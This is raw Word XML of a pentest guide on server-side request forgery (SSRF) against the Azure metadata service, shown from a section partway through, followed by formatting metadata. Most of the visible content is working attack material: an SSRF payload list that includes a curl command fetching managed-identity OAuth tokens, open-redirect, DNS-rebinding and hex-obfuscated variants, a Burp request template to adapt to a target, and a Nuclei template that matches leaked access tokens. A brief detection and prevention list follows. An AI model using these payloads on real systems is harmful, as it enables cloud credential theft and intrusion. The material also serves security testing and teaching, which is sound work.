        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> 6. Validate Environment Variables in SSRF Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E7A01" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Look for exposed container metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B6203" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://169.254.170.2/v2/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BEB47" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>From inside Azure Container Instances or App Services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092DC2A3" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="3B909166" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> SSRF Payload Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426DA03" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t># Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51866467" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://169.254.169.254/metadata/identity/oauth2/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6AFEA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="00577E73" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t># With resource and header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379ABE78" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>curl -H "Metadata:true" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689E061" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://vault.azure.net/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271C8D9" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="5232FDFB" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t># Open redirect abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09465529" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>https://vulnerable.com/redirect?url=http://169.254.169.254/metadata/identity/oauth2/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DCA9A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="5F926570" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t># DNS rebinding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A5E52" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://yourattackercontrolleddomain.com → points to metadata IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56112117" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="6A2F5D20" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:lastRenderedPageBreak/>
        <w:t># Obfuscated format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36147270" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>http://0xA9FEA9FE/metadata/identity/oauth2/token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976F60C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="73CA0F82" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Detection &amp; Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1F6AC" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Restrict outbound traffic to 169.254.169.254 via NSG or Azure Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120F57C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Validate URLs and restrict domains in user inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38765716" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Use WAF rules to detect internal IP access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7B3F2" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Audit Managed Identity token usage via Azure AD logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF134B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="10540FEC" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Burp Suite Repeater (Azure SSRF to Metadata Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F384F7" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="006F38E7" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="30409BFF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Request Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD5C2E" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>GET /?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB622AF" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Host: vulnerable-azure-app.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D6279" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Metadata: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197A010" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>User-Agent: Mozilla/5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E45310" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> Modify the url parameter and Host as per your target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02537112" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="56257483" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Success Indicator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F3AF8A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>Look for a 200 OK and response containing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A22BD5" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>"access_token": "eyJ0eXAiOiJKV1QiLCJh..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08785709" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAFA0C8" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F37A03">
        <w:t>Nuclei Template (Azure SSRF IMDS Discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB7C815" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>id: azure-imds-ssrf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483CD03" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="4F5C9779" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2BDD51" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  name: Azure SSRF to IMDS Token Leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D63687" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  author: pentester-labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6CB89" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  severity: high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB0F3A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  description: Detects SSRF access to Azure Instance Metadata Service for token extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3F05A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  tags: azure,ssrf,imds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33185CBA" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="48AA0F9B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t>requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F258473" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">  - method: GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D571322" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">    path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085D3A6" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">      - "{{BaseURL}}/?url=http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915480C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">    headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6079A570" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">      Metadata: "true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC928E" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">    matchers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F1566" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">      - type: regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3784AC4B" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">        regex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D28299" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">          - '"access_token"\s*:\s*".+?"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9211D" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      - type: status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8475A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">        status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC61E2A" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve">          - 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547FFC43" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D">
      <w:r w:rsidRPr="00F37A03">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00F37A03">
        <w:t xml:space="preserve"> Ensure the target has a vulnerable endpoint that reflects or uses the url parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD695C" w14:textId="77777777" w:rsidR="00A74E4D" w:rsidRPr="00F37A03" w:rsidRDefault="00A74E4D" w:rsidP="00A74E4D"/>
    <w:p w14:paraId="26EF7D19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997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="103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F4593"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC9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D2D23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EC4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5DA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="509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B30FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3D49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B416F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F02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F3BDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3A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78C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2B2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317D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B92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C2E94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="421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3084C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D93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D2682"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="099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C4E7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="418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D54D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9800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85936"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83A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284975">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1785225602">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1141342188">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="684594529">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1364941975">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1137720649">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1054500496">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="642085343">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2023894842">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="687562971">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="997222133">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="178660434">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1109281375">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1978993048">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1668365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4D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74E4D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E79B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B553B14C-1C74-4989-A014-9CE8C77D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E4D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E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E4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E4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E4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E4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E4D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E4D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E4D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E4D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E4D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E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E4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A74E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E4D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A74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E4D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A74E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E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69.254.169.254/metadata/identity/oauth2/tok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2026-04-06T04:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T04:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>